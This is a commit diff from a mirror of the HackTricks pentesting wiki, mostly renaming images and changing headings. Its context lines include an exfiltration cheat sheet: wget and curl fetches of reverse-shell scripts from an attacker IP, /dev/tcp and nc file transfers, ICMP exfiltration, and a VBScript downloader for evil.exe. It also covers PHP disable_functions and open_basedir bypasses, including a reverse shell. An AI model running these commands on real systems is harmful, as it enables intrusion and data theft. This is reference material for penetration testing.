0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [#3330] No subject

This commit is contained in:
CPol 2022-07-21 20:01:55 +00:00 committed by gitbook-bot
parent 25207a20d2
commit 341a55ff9d
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
28 changed files with 104 additions and 108 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
.gitbook/assets/image (307) (5) (1).png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 509 KiB

BIN
.gitbook/assets/image (307) (5).png
View File

Binary file not shown.
Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 509 KiB

After

Width:  |  Height:  |  Size: 96 KiB

BIN
.gitbook/assets/image (307).png
View File

Binary file not shown.
Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 96 KiB

After

Width:  |  Height:  |  Size: 14 KiB

2
1911-pentesting-fox.md
View File

@ -26,7 +26,7 @@ dht udp "DHT Nodes"
![](<.gitbook/assets/image (273).png>)
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
InfluxDB

4
README.md
View File

@ -58,7 +58,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
### [Security Hubs](https://securityhubs.io/)
![](<.gitbook/assets/security-hubs-logo\_v1.2 (1).png>)
![](<.gitbook/assets/image (307).png>)
Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results.** [**Security Hubs**](https://securityhubs.io/) **** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
@ -75,7 +75,7 @@ Through Security Skills as a Service, we help organizations to **defend against
### [Intigriti](https://www.intigriti.com)
![](<.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
![](<.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14).png>)
**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.**

2
exploiting/linux-exploiting-basic-esp/README.md
View File

@ -405,7 +405,7 @@ Get the address to this table with: **`objdump -s -j .got ./exec`**
Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT`
![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1).png>)
![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1).png>)
Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table:

2
forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md
View File

@ -65,7 +65,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig
In order to mount a MBR in Linux you first need to get the start offset (you can use `fdisk` and the the `p` command)
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>)
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (3).png>)
An then use the following code

2
forensics/basic-forensic-methodology/windows-forensics/README.md
View File

@ -152,7 +152,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png>)
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (4).png>)
### USB Detective

70
generic-methodologies-and-resources/exfiltration.md
View File

@ -1,5 +1,7 @@
# Exfiltration
## Exfiltration
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -16,32 +18,30 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (16).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
## Copy\&Paste Base64
### Copy\&Paste Base64
#### Linux
**Linux**
```bash
base64 -w0 <file> #Encode file
base64 -d file #Decode file
```
#### Windows
**Windows**
```
certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll
```
## HTTP
### HTTP
#### Linux
**Linux**
```bash
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
@ -50,7 +50,7 @@ curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD
```
#### Windows
**Windows**
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
@ -67,11 +67,11 @@ Start-BitsTransfer -Source $url -Destination $output
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
```
### Upload files
#### Upload files
[**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
### **HTTPS Server**
#### **HTTPS Server**
```python
# from https://gist.github.com/dergachev/7028596
@ -114,23 +114,23 @@ if __name__ == "__main__":
###
```
## FTP
### FTP
### FTP server (python)
#### FTP server (python)
```bash
pip3 install pyftpdlib
python3 -m pyftpdlib -p 21
```
### FTP server (NodeJS)
#### FTP server (NodeJS)
```
sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp
```
### FTP server (pure-ftp)
#### FTP server (pure-ftp)
```bash
apt-get update && apt-get install pure-ftp
@ -150,7 +150,7 @@ chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
```
### **Windows** client
#### **Windows** client
```bash
#Work well with python. With pure-ftp use fusr:ftp
@ -163,14 +163,12 @@ echo bye >> ftp.txt
ftp -n -v -s:ftp.txt
```
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (16).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
## SMB
### SMB
Kali as server
@ -208,7 +206,7 @@ WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.1
WindPS-2> cd new_disk:
```
## SCP
### SCP
The attacker has to have SSHd running.
@ -216,7 +214,7 @@ The attacker has to have SSHd running.
scp <username>@<Attacker_IP>:<directory>/<filename>
```
# SSHFS
## SSHFS
If the victim has SSH, the attacker can mount a directory from the victim to the attacker.
@ -226,23 +224,23 @@ sudo mkdir /mnt/sshfs
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/
```
## NC
### NC
```bash
nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file
```
## /dev/tcp
### /dev/tcp
### Download file from victim
#### Download file from victim
```bash
nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
```
### Upload file to victim
#### Upload file to victim
```bash
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
@ -253,7 +251,7 @@ cat <&6 > file.txt
thanks to **@BinaryShadow\_**
## **ICMP**
### **ICMP**
```bash
#In order to exfiltrate the content of a file via pings you can do:
@ -273,7 +271,7 @@ def process_packet(pkt):
sniff(iface="tun0", prn=process_packet)
```
## **SMTP**
### **SMTP**
If you can send data to an SMTP server, you can create a SMTP to receive the data with python:
@ -281,7 +279,7 @@ If you can send data to an SMTP server, you can create a SMTP to receive the dat
sudo python -m smtpd -n -c DebuggingServer :25
```
## TFTP
### TFTP
By default in XP and 2003 (in others it need to be explicitly added during installation)
@ -307,7 +305,7 @@ In **victim**, connect to the Kali server:
tftp -i <KALI-IP> get nc.exe
```
## PHP
### PHP
Download a file with a PHP oneliner:
@ -315,13 +313,13 @@ Download a file with a PHP oneliner:
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
```
## VBScript
### VBScript
```bash
Attacker> python -m SimpleHTTPServer 80
```
#### Victim
**Victim**
```bash
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
@ -355,7 +353,7 @@ echo ts.Close >> wget.vbs
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
```
## Debug.exe
### Debug.exe
This is a crazy technique that works on Windows 32 bit machines. Basically the idea is to use the `debug.exe` program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like `netcat`. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with `debug.exe`.
@ -373,16 +371,14 @@ wine exe2bat.exe nc.exe nc.txt
Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe
## DNS
### DNS
* [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (16).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
<details>

6
generic-methodologies-and-resources/pentesting-methodology.md
View File

@ -23,7 +23,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -78,7 +78,7 @@ There are also several tools that can perform **automatic vulnerabilities assess
In some scenarios a **Brute-Force** could be useful to **compromise** a **service**. [**Find here a CheatSheet of different services brute forcing**](brute-force.md)**.**
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -165,7 +165,7 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve
* [**Padding Oracle**](../cryptography/padding-oracle-priv.md)
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}

4
generic-methodologies-and-resources/pentesting-network/README.md
View File

@ -17,7 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">****\
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">****\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -792,7 +792,7 @@ Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 19
Bettercap broadcast WSD packets searching for services (UDP Port 3702).
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}

2
generic-methodologies-and-resources/phishing-methodology/README.md
View File

@ -343,7 +343,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke
* Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
* You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (6).png>)
![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (6).png>)
{% hint style="info" %}
It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\

2
macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md
View File

@ -146,7 +146,7 @@ The response is a JSON dictionary with some important data like:
* Signed using the **device identity certificate (from APNS)**
* **Certificate chain** includes expired **Apple iPhone Device CA**
![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
### Step 6: Profile Installation

2
mobile-pentesting/android-app-pentesting/android-applications-basics.md
View File

@ -241,7 +241,7 @@ In this case you could try to abuse the functionality creating a web with the fo
In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**.
![](<../../.gitbook/assets/image (436) (1) (1) (1).png>)
![](<../../.gitbook/assets/image (436) (1) (1).png>)
Learn how to [call deep links without using HTML pages](./#exploiting-schemes-deep-links).

2
mobile-pentesting/ios-pentesting/README.md
View File

@ -731,7 +731,7 @@ You can collect console logs through the Xcode **Devices** window as follows:
5. Reproduce the problem.
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14).png>)
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:

4
network-services-pentesting/pentesting-snmp/README.md
View File

@ -19,7 +19,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -249,7 +249,7 @@ Entry_5:
```
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}

10
network-services-pentesting/pentesting-web/graphql.md
View File

@ -90,11 +90,11 @@ Now that we know which kind of information is saved inside the database, let's t
In the introspection you can find **which object you can directly query for** (because you cannot query an object just because it exists). In the following image you can see that the "_queryType_" is called "_Query_" and that one of the fields of the "_Query_" object is "_flags_", which is also a type of object. Therefore you can query the flag object.
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-17-48.png>)
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-17-48.png)
Note that the type of the query "_flags_" is "_Flags_", and this object is defined as below:
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-22-57.png>)
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-22-57.png)
You can see that the "_Flags_" objects are composed by **name** and .**value** Then you can get all the names and values of the flags with the query:
@ -217,7 +217,7 @@ Or even **relations of several different objects using aliases**:
In the **introspection** you can find the **declared** **mutations**. In the following image the "_MutationType_" is called "_Mutation_" and the "_Mutation_" object contains the names of the mutations (like "_addPerson_" in this case):
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-26-27.png>)
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-26-27.png)
For this example imagine a data base with **persons** identified by the email and the name and **movies** identified by the name and rating. A **person** can be **friend** with other **persons** and a person can **have movies**.
@ -277,7 +277,7 @@ Below you can find the simplest demonstration of an application authentication r
As we can see from the response screenshot, the first and the third requests returned _null_ and reflected the corresponding information in the _error_ section. The **second mutation had the correct authentication** data and the response has the correct authentication session token.
![](<../../.gitbook/assets/image (119) (2).png>)
![](<../../.gitbook/assets/image (119) (1).png>)
## CSRF in GraphQL
@ -312,6 +312,7 @@ Also, abusing a [**XS-Search**](../../pentesting-web/xs-search.md) **attack** mi
For more information **check the** [**original post here**](https://blog.doyensec.com/2021/05/20/graphql-csrf.html).
## Authorization in GraphQL
Many GraphQL functions defined on the endpoint might only check the authentication of the requester but not authorization.
Modifying query input variables could lead to sensitive account details [leaked](https://hackerone.com/reports/792927).
@ -327,6 +328,7 @@ Mutation could even lead to account take over trying to modify other account dat
```
## Leaked GraphQL Structures
If introspection is disabled, try looking at the website source code. The queries are often pre loaded into browser as javascript libraries. These prewritten queries can reveal powerful information about the schema and use of each object and function. The `Sources` tab of the developer tools can search all files to enumerate where the queries are saved. Sometimes even the administrator protected queries are already exposed.
```javascript

2
network-services-pentesting/pentesting-web/iis-internet-information-services.md
View File

@ -338,7 +338,7 @@ C:\xampp\tomcat\conf\server.xml
If you see an error like the following one:
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10).png>)
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10).png>)
It means that the server **didn't receive the correct domain name** inside the Host header.\
In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one.

70
network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
View File

@ -1,4 +1,4 @@
# PHP - Useful Functions & disable\_functions/open\_basedir bypass
<details>
@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
## PHP Command & Code Execution
# PHP Command & Code Execution
## PHP Command Execution
### PHP Command Execution
**exec** - Returns last line of commands output
@ -83,7 +82,7 @@ file_put_contents('/www/readflag.sh', base64_decode('IyEvYmluL3NoCi9yZWFkZmxhZyA
**dl** - This function can be used to dynamically load a PHP extension. This function won't be present always, so you should check if it's available before trying to exploit it. Read[ this page to learn how to exploit this function](disable\_functions-bypass-dl-function.md).
## PHP Code Execution
### PHP Code Execution
Apart from eval there are other ways to execute PHP code: include/require can be used for remote code execution in the form of Local File Include and Remote File Include vulnerabilities.\
**${\<php code>}** - If your input gets reflected in any PHP string, it will be executed.\
@ -101,7 +100,7 @@ Apart from eval there are other ways to execute PHP code: include/require can be
**$func->invokeArgs(array());**\
**serialize/unserialize**
# disable\_functions & open\_basedir
## disable\_functions & open\_basedir
**Disabled functions** is the setting that can be configured in `.ini` files in PHP that will **forbid** the use of the indicated **functions**. **Open basedir** is the setting that indicates to PHP the folder that it can access.\
The PHP setting sue to be configured in the path _/etc/php7/conf.d_ or similar.
@ -112,12 +111,12 @@ Both configuration can be seen in the output of **`phpinfo()`**:
![](<../../../../.gitbook/assets/image (347).png>)
# open\_basedir Bypass
## open\_basedir Bypass
`open_basedir` will configure the folders that PHP can access, you **won't be able to to write/read/execute any file outside** those folders, but also you **won't even be able to list** other directories.\
However, if somehow you are able to execute arbitrary PHP code you can **try** the following chunk of **codes** to try to **bypass** the restriction.
## Listing dirs with glob:// bypass
### Listing dirs with glob:// bypass
In this first example the `glob://` protocol with some path bypass is used:
@ -142,7 +141,7 @@ foreach($file_list as $f){
**Note2**: It looks like part of the code is duplicated, but that's actually necessary!\
**Note3**: This example is only useful to list folders not to read files
## Full open\_basedir bypass abusing FastCGI
### Full open\_basedir bypass abusing FastCGI
If you want to **learn more about PHP-FPM and FastCGI** you can read the [first section of this page](disable\_functions-bypass-php-fpm-fastcgi.md).\
If **`php-fpm`** is configured you can abuse it to completely bypass **open\_basedir**:
@ -505,7 +504,7 @@ echo $client->request($params, $code)."\n";
?>
```
This scripts will communicate with **unix socket of php-fpm** (usually located in /var/run if fpm is used) to execute arbitrary code. The `open_basedir` settings will be overwritten by the **PHP\_VALUE** attribute that is sent.\
This scripts will communicate with **unix socket of php-fpm** (usually located in /var/run if fpm is used) to execute arbitrary code. The `open_basedir` settings will be overwritten by the **PHP\_VALUE** attribute that is sent.\
Note how `eval` is used to execute the PHP code you send inside the **cmd** parameter.\
Also note the **commented line 324**, you can uncomment it and the **payload will automatically connect to the given URL and execute the PHP code** contained there.\
Just access `http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/passwd');` to get the content of the `/etc/passwd` file.
@ -514,24 +513,24 @@ Just access `http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/p
You may be thinking that just in the same way we have overwritten `open_basedir` configuration we can **overwrite `disable_functions`**. Well, try it, but it won't work, apparently **`disable_functions` can only be configured in a `.ini` php** configuration file and the changes you perform using PHP\_VALUE won't be effective on this specific setting.
{% endhint %}
# disable\_functions Bypass
## disable\_functions Bypass
If you manage have PHP code executing inside a machine you probably want to go to the next level and **execute arbitrary system commands**. In this situation is usual to discover that most or all the PHP **functions** that allow to **execute system commands have been disabled** in **`disable_functions`.**\
If you manage have PHP code executing inside a machine you probably want to go to the next level and **execute arbitrary system commands**. In this situation is usual to discover that most or all the PHP **functions** that allow to **execute system commands have been disabled** in **`disable_functions`.**\
So, lets see how you can bypass this restriction (if you can)
## Automatic bypass discovery
### Automatic bypass discovery
You can use the tool [https://github.com/teambi0s/dfunc-bypasser](https://github.com/teambi0s/dfunc-bypasser) and it will indicate you which technique you can use to bypass `disable_functions`.
## Bypassing using other system functions
### Bypassing using other system functions
Just return to the begging of this page and **check if any of the command executing functions isn't disabled and available in the environment**. If you find just 1 of them, you will be able to use it to execute arbitrary system commands.
## LD\_PRELOAD bypass
### LD\_PRELOAD bypass
It's well known that some functions in PHP like `mail()`are going to **execute binaries inside the system**. Therefore, you can abuse them using the environment variable `LD_PRELOAD` to make them load an arbitrary library that can execute anything.
### Functions that can be used to bypass disable\_functions with LD\_PRELOAD
#### Functions that can be used to bypass disable\_functions with LD\_PRELOAD
1. `mail`
2. `mb_send_mail` : If your system has `php-mbstring` module installed then this function can be used to bypass php disable\_functions.
@ -557,10 +556,10 @@ uid_t getuid(void){
}
```
### Bypass using Chankro
#### Bypass using Chankro
In order to abuse this misconfiguration you can [**Chankro**](https://github.com/TarlogicSecurity/Chankro). This is a tool that will **generate a PHP exploit** that you need to upload to the vulnerable server and execute it (access it via web).\
**Chankro** will write inside the victims disc the **library and the reverse shell** you want to execute and will use the**`LD_PRELOAD` trick + PHP `mail()`** function to execute the reverse shell.
**Chankro** will write inside the victims disc the **library and the reverse shell** you want to execute and will use the\*\*`LD_PRELOAD` trick + PHP `mail()`\*\* function to execute the reverse shell.
Note that in order to use **Chankro**, `mail` and `putenv` **cannot appear inside the `disable_functions` list**.\
In the following example you can see how to **create a chankro exploit** for **arch 64**, that will execute `whoami` and save the out in _/tmp/chankro\_shell.out_, chankro will **write the library and the payload** in _/tmp_ and the **final exploit** is going to be called **bicho.php** (that's the file you need to upload to the victims server):
@ -583,7 +582,7 @@ python2 chankro.py --arch 64 --input shell.sh --path /tmp --output bicho.php
If you find that **mail** function is blocked by disabled functions, you may still be able to use the function **mb\_send\_mail.**\
More information about this technique and Chankro here: [https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/](https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/)
## "Bypass" using PHP capabilities
### "Bypass" using PHP capabilities
Note that using **PHP** you can **read and write files, create directories and change permissions**.\
You can even **dump databases**.\
@ -591,10 +590,16 @@ Maybe using **PHP** to **enumerate** the box you can find a way to escalate priv
I have created a webshell that makes very easy to perform this actions (note that most webshells will offer you this options also): [https://github.com/carlospolop/phpwebshelllimited](https://github.com/carlospolop/phpwebshelllimited)
## Modules/Version dependent bypasses
### Modules/Version dependent bypasses
There are several ways to bypass disable\_functions if some specific module is being used or exploit some specific PHP version:
* [**FastCGI/PHP-FPM (FastCGI Process Manager)**](disable\_functions-bypass-php-fpm-fastcgi.md)
* [**Bypass with FFI - Foreign Function Interface enabled**](broken-reference)****
* [**Bypass via mem**](disable\_functions-bypass-via-mem.md)
* [**mod\_cgi**](disable\_functions-bypass-mod\_cgi.md)
* [**PHP Perl Extension Safe\_mode**](disable\_functions-bypass-php-perl-extension-safe\_mode-bypass-exploit.md)
* [**dl function**](disable\_functions-bypass-dl-function.md)****
* [**This exploit**](https://github.com/mm0r1/exploits/tree/master/php-filter-bypass)
* 5.\* - exploitable with minor changes to the PoC
* 7.0 - all versions to date
@ -604,28 +609,24 @@ There are several ways to bypass disable\_functions if some specific module is b
* 7.4 - all versions to date
* 8.0 - all versions to date
* [**From 7.0 to 8.0 exploit (Unix only)**](https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php)
* [**FastCGI/PHP-FPM (FastCGI Process Manager)**](disable\_functions-bypass-php-fpm-fastcgi.md)
* **dl function**
* [**PHP 7.0=7.4 (\*nix)**](disable\_functions-bypass-php-7.0-7.4-nix-only.md#php-7-0-7-4-nix-only)
* [**Imagick 3.3.0 PHP >= 5.4**](disable\_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md)
* [**PHP 5.x Shellsock**](disable\_functions-php-5.x-shellshock-exploit.md)
* [**PHP 5.2.4 ionCube**](disable\_functions-php-5.2.4-ioncube-extension-exploit.md)
* [**PHP <= 5.2.9 Windows**](disable\_functions-bypass-php-less-than-5.2.9-on-windows.md)
* [**PHP 5.2.4/5.2.5 cURL**](disable\_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md)
* [**PHP Perl Extension Safe\_mode**](disable\_functions-bypass-php-perl-extension-safe\_mode-bypass-exploit.md)
* [**PHP 5.2.3 -Win32std**](disable\_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md)
